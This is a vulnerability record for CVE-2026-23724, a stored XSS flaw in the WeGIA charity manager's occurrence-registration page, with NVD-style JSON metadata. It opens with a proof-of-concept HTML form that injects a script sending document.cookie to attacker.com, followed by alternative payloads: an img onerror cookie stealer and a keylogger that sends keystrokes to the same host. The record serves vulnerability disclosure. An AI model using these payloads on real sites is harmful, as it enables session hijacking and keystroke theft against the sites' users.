CVE-2026-23724

<!-- CVE-2026-23724 Stored XSS PoC --> <!-- Target: WeGIA html/atendido/cadastro_ocorrencia.php --> <!-- Step 1: Inject malicious JavaScript via Atendido field --> <form action="https://target.com/html/atendido/cadastro_ocorrencia.php" method="POST"> <input type="hidden" name="atendido" value="<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>"> <input type="submit" value="Exploit"> </form> <!-- Alternative XSS payloads --> <!-- Basic: <script>alert('XSS')</script> --> <!-- Cookie stealing: <img src=x onerror="this.src='https://attacker.com/?c='+document.cookie"> --> <!-- Keylogger: <body onload="document.addEventListener('keypress',function(e){fetch('https://attacker.com/k?k='+e.key)})"> -->

{"cve": {"id": "CVE-2026-23724", "sourceIdentifier": "[email protected]", "published": "2026-01-16T20:15:50.310", "lastModified": "2026-01-30T18:29:45.610", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WeGIA is a web manager for charitable institutions. Prior to 3.6.2, a Stored Cross-Site Scripting (XSS) vulnerability was identified in the html/atendido/cadastro_ocorrencia.php endpoint of the WeGIA application. The application does not sanitize user-controlled data before rendering it inside the “Atendido” selection dropdown. This vulnerability is fixed in 3.6.2."}, {"lang": "es", "value": "WeGIA es un gestor web para instituciones benéficas. Previo a la 3.6.2, se identificó una vulnerabilidad de cross-site scripting (XSS) almacenado en el endpoint html/atendido/cadastro_ocorrencia.php de la aplicación WeGIA. La aplicación no sanitiza los datos controlados por el usuario antes de renderizarlos dentro del menú desplegable de selección 'Atendido'. Esta vulnerabilidad está corregida en la 3.6.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wegia:wegia:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.2", "matchCriteriaId": "419B3A85-5754-4198-A73E-92A9DA8E7A68"}]}]}], "references": [{"url": "https://github.com/LabRedesCefetRJ/WeGIA/pull/1333", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-3r3q-8573-g3cq", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}